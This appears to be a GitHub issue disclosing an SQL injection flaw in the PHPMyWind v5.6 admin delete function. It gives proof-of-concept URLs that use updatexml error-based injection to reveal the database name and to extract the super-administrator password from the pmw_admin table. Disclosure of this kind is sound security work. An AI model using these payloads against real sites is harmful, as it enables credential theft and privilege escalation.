Skip to content

sql injection exists many places in PHPMyWind v5.6 #10

Open
@songxpu

Description

@songxpu

Product Homepage:http://phpmywind.com/
hello!
I found a serious SQL injection vulnerability in the backend management system(/admin/admin_save.php) of PHPMyWind v5.6

3

This vulnerability allows low-privilege site administrators to gain access to super-administrator accounts and passwords

Vulnerability validation:
First, there are three types of administrators in the current system: super administrators, site administrators, and article publishers
1
Now to the site administrator login background management system, click the administrator management, and then "delete function" is the location of the vulnerability
4
it's url is http://127.0.0.1/admin/admin_save.php?action=del&id=4
5
POC
(1)
http://127.0.0.1/admin/admin_save.php?action=del&id=4%27
6
(2)show the current database

http://127.0.0.1/admin/admin_save.php?action=del&id=4%20%20and%20id%20in%20(char(@`%27`),updatexml(1,concat(0x7e,(select%20database())),1),char(@`%27`))

7
(3) Query out the super administrator password

http://127.0.0.1/admin/admin_save.php?action=del&id=4  and id in (char(@`'`),updatexml(1,concat(0x7e,(select password from pmw_admin limit 0,1)),1),char(@`'`))

8
This vulnerability allows you to query the database for any data you want

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions